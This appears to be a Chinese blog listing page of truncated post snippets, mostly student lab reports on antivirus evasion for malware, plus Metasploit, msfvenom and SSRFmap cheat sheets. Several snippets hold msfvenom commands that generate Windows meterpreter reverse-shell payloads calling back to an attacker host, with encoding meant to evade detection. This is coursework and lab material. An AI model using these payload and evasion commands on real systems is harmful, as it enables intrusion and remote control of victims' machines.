• 2024-10-3120222415 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容学习了恶意代码和恶意代码的分析,并介绍了信息搜集技术和怎样进行信息搜集。2.实验过程1.1正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧(1)使用msf生成可执行文件并检测生成payload并检测msfvenom-pwindows/meterpreter/reverse_tcpLHOS
  • 2024-10-2320222407 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    一、实验内容本次实验的目标在于运用多重加密、文件格式伪装、数据填充、加壳等技术方法达成恶意代码的免杀效果,生成恶意程序,并对其进行测试,以检验其能否成功躲避杀毒软件的检测。本次实验具体内容如下:1.正确使用msf编码器,使用msfvenom生成如jar之类的其他文件;2.能够使用veil,加壳
  • 2024-10-2220222406 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    202224062024-2025-1《网络与系统攻防技术》实验三实验报告1.实验内容1.1实践内容正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧通过组合应用各种技术实现恶意代码免杀用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
  • 2024-10-21《网络与系统攻防技术》实验三实验报告
    1.实践内容(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原理,不要截图。与杀
  • 2024-10-1820222410 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软
  • 2023-05-24SSRFmap-20230329
    Usage:ssrfmap.py[-h][-rREQFILE][-pPARAM][-mMODULES][-l[HANDLER]][-v[VERBOSE]][--lhostLHOST][--lportLPORT][--rfiles[TARGETFILES]][--uagentUSERAGENT][--ssl[SSL]][--proxyPROXY][--level[LEVEL]]选项:-h,--help显示此帮助
  • 2023-02-26msfvenom常用payload命令
    windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-
  • 2023-01-14PHP后门反弹演示
    准备一台kali虚拟机一台win11物理机phpstudy开启Nginx和Mysqlphpstudy中已经搭建好DVWA靶场DVWA靶场的安全等级调整值low​注意:需要将杀毒软件个关了,否则有提示,黑
  • 2022-10-03Metasploit训练基础-网络后门
    后门后门,本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的
  • 2022-09-28msfvenom各平台payload生成
    二进制windowsmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.211.55.2LPORT=3333-ax86--platformWindows-fexe>shell.exemsfvenom-pwindows/x64/meterp
  • 2022-09-28Metasploit 常用命令手册
    Installationcurlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb>msfinstall&&